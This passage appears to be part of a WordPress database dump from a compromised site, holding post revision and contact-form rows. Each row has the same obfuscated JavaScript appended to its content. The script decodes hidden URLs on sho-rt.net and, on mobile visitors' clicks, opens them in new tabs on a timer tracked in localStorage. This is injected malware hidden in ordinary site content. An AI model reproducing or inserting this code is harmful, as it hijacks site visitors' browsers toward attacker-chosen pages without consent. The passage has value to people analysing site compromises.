g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-19 21:54:52','2023-08-19 21:54:52','',3066,'https://gsw2023.com/?p=5344',0,'revision','',0),
(5345,1,'2023-08-20 22:39:23','2023-08-20 22:39:23','{\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"format\":\"first-last\",\"label\":\"Name\",\"required\":\"1\",\"size\":\"medium\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"required\":\"1\",\"size\":\"medium\",\"allowlist\":\"\",\"denylist\":\"\",\"default_value\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}],\"field_id\":3,\"settings\":{\"form_title\":\"Please Fill Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us<\\/p>\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"form_pages_title\":\"Simple Contact Form\",\"conversational_forms_title\":\"Please Fill Contact Form\",\"form_pages_page_slug\":\"please-fill-contact-form\",\"conversational_forms_page_slug\":\"please-fill-contact-form\"},\"meta\":{\"template\":\"simple-contact-form-template\"},\"id\":\"5345\",\"payments\":[]}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','publish','closed','closed','','simple-contact-form','','','2023-08-22 21:22:10','2023-08-22 21:22:10','',0,'https://gsw2023.com/?post_type=wpforms&#038;p=5345',0,'wpforms','',0),
(5346,1,'2023-08-20 22:39:57','2023-08-20 22:39:57','{\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}],\"id\":\"5345\",\"field_id\":3,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 